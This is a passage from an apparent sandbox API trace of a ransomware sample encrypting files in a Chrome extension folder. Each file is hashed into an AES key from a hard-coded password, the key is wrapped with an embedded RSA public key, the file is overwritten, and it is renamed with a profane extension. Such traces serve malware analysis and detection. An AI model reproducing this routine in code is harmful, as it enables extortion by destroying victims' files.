data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif.gsg")) returned 1 [0258.718] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif.fuck")) returned 1 [0258.719] CryptDestroyHash (hHash=0x2e7fc00) returned 1 [0258.719] CryptDestroyKey (hKey=0x2e7c380) returned 1 [0258.719] CryptReleaseContext (hProv=0x2e7b028, dwFlags=0x0) returned 1 [0258.719] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0258.719] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cff4 | out: lpSystemTimeAsFileTime=0x2b9cff4) [0258.720] GetLastError () returned 0x0 [0258.720] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png")) returned 0x20 [0258.720] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png", dwFileAttributes=0x80) returned 1 [0258.721] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0258.721] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0258.722] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png.gsg", dwFileAttributes=0x2) returned 1 [0258.722] CryptAcquireContextA (in: phProv=0x2b9bff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bff0*=0x2e7be80) returned 1 [0258.724] CryptCreateHash (in: hProv=0x2e7be80, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bff4 | out: phHash=0x2b9bff4) returned 1 [0258.724] lstrlenA (lpString="QPmjqALrRVCjmscVAzZjjQwqzMlQm") returned 29 [0258.724] CryptHashData (hHash=0x2e7fc00, pbData=0x28cb378, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0258.724] CryptDeriveKey (in: hProv=0x2e7be80, Algid=0x6610, hBaseData=0x2e7fc00, dwFlags=0x1000000, phKey=0x2b9bfe0 | out: phKey=0x2b9bfe0*=0x2e7c2c0) returned 1 [0258.724] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----c", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0258.724] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bffc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8 | out: pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8) returned 1 [0258.724] CryptAcquireContextA (in: phProv=0x2b9bfec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bfec*=0x2e7b798) returned 1 [0258.725] CryptImportPublicKeyInfo (in: hCryptProv=0x2e7b798, dwCertEncodingType=0x1, pInfo=0x2e25ac0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e25af0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e25af8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bfe4 | out: phKey=0x2b9bfe4*=0x2e7c880) returned 1 [0258.725] CryptEncrypt (in: hKey=0x2e7c880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x80) returned 1 [0258.725] CryptEncrypt (in: hKey=0x2e7c880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e7b248*, pdwDataLen=0x2b9bfe8*=0x18, dwBufLen=0x80 | out: pbData=0x2e7b248*, pdwDataLen=0x2b9bfe8*=0x80) returned 1 [0258.725] WriteFile (in: hFile=0x5d50, lpBuffer=0x2e7b248*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x2e7b248*, lpNumberOfBytesWritten=0x2b9bff8*=0x80, lpOverlapped=0x0) returned 1 [0258.726] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.733] CryptEncrypt (in: hKey=0x2e7c2c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.733] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.735] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.735] CryptEncrypt (in: hKey=0x2e7c2c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.735] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.735] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.735] CryptEncrypt (in: hKey=0x2e7c2c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.735] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.735] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.735] CryptEncrypt (in: hKey=0x2e7c2c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.735] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.735] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x309, lpOverlapped=0x0) returned 1 [0258.739] CryptEncrypt (in: hKey=0x2e7c2c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x309, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x310) returned 1 [0258.739] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x310, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x310, lpOverlapped=0x0) returned 1 [0258.739] CloseHandle (hObject=0x5d60) returned 1 [0258.739] CloseHandle (hObject=0x5d50) returned 1 [0258.740] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png"), bFailIfExists=0) returned 1 [0258.742] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png", dwFileAttributes=0x0) returned 1 [0258.742] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png.gsg")) returned 1 [0258.743] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png.fuck")) returned 1 [0258.744] CryptDestroyHash (hHash=0x2e7fc00) returned 1 [0258.745] CryptDestroyKey (hKey=0x2e7c2c0) returned 1 [0258.745] CryptReleaseContext (hProv=0x2e7be80, dwFlags=0x0) returned 1 [0258.745] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0258.745] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cff4 | out: lpSystemTimeAsFileTime=0x2b9cff4) [0258.745] GetLastError () returned 0x0 [0258.745] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png")) returned 0x20 [0258.746] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png", dwFileAttributes=0x80) returned 1 [0258.746] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0258.747] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0258.748] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png.gsg", dwFileAttributes=0x2) returned 1 [0258.748] CryptAcquireContextA (in: phProv=0x2b9bff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bff0*=0x2e7b820) returned 1 [0258.752] CryptCreateHash (in: hProv=0x2e7b820, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bff4 | out: phHash=0x2b9bff4) returned 1 [0258.752] lstrlenA (lpString="QPmjqALrRVCjmscVAzZjjQwqzMlQm") returned 29 [0258.753] CryptHashData (hHash=0x2e7fc00, pbData=0x28cb350, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0258.753] CryptDeriveKey (in: hProv=0x2e7b820, Algid=0x6610, hBaseData=0x2e7fc00, dwFlags=0x1000000, phKey=0x2b9bfe0 | out: phKey=0x2b9bfe0*=0x2e7c640) returned 1 [0258.753] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----c", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0258.753] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bffc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8 | out: pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8) returned 1 [0258.753] CryptAcquireContextA (in: phProv=0x2b9bfec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bfec*=0x2e7b688) returned 1 [0258.753] CryptImportPublicKeyInfo (in: hCryptProv=0x2e7b688, dwCertEncodingType=0x1, pInfo=0x2e25b90*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e25bc0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e25bc8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bfe4 | out: phKey=0x2b9bfe4*=0x2e7c600) returned 1 [0258.753] CryptEncrypt (in: hKey=0x2e7c600, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x80) returned 1 [0258.753] CryptEncrypt (in: hKey=0x2e7c600, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e7b1c0*, pdwDataLen=0x2b9bfe8*=0x18, dwBufLen=0x80 | out: pbData=0x2e7b1c0*, pdwDataLen=0x2b9bfe8*=0x80) returned 1 [0258.754] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e7b1c0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x2e7b1c0*, lpNumberOfBytesWritten=0x2b9bff8*=0x80, lpOverlapped=0x0) returned 1 [0258.761] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x22c, lpOverlapped=0x0) returned 1 [0258.763] CryptEncrypt (in: hKey=0x2e7c640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x22c, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x230) returned 1 [0258.763] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x230, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x230, lpOverlapped=0x0) returned 1 [0258.769] CloseHandle (hObject=0x5d50) returned 1 [0258.769] CloseHandle (hObject=0x5d60) returned 1 [0258.770] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png"), bFailIfExists=0) returned 1 [0258.776] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png", dwFileAttributes=0x0) returned 1 [0258.776] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png.gsg")) returned 1 [0258.778] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png.fuck")) returned 1 [0258.781] CryptDestroyHash (hHash=0x2e7fc00) returned 1 [0258.781] CryptDestroyKey (hKey=0x2e7c640) returned 1 [0258.781] CryptReleaseContext (hProv=0x2e7b820, dwFlags=0x0) returned 1 [0258.781] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0258.781] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cff4 | out: lpSystemTimeAsFileTime=0x2b9cff4) [0258.781] GetLastError () returned 0x0 [0258.781] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png")) returned 0x20 [0258.782] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png", dwFileAttributes=0x80) returned 1 [0258.783] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0258.784] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0258.784] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png.gsg", dwFileAttributes=0x2) returned 1 [0258.785] CryptAcquireContextA (in: phProv=0x2b9bff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bff0*=0x2e7b028) returned 1 [0258.787] CryptCreateHash (in: hProv=0x2e7b028, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bff4 | out: phHash=0x2b9bff4) returned 1 [0258.787] lstrlenA (lpString="QPmjqALrRVCjmscVAzZjjQwqzMlQm") returned 29 [0258.787] CryptHashData (hHash=0x2e7fc00, pbData=0x28cb4b8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0258.787] CryptDeriveKey (in: hProv=0x2e7b028, Algid=0x6610, hBaseData=0x2e7fc00, dwFlags=0x1000000, phKey=0x2b9bfe0 | out: phKey=0x2b9bfe0*=0x2e7c380) returned 1 [0258.787] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----c", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0258.787] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bffc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8 | out: pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8) returned 1 [0258.787] CryptAcquireContextA (in: phProv=0x2b9bfec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bfec*=0x2e7b9b8) returned 1 [0258.788] CryptImportPublicKeyInfo (in: hCryptProv=0x2e7b9b8, dwCertEncodingType=0x1, 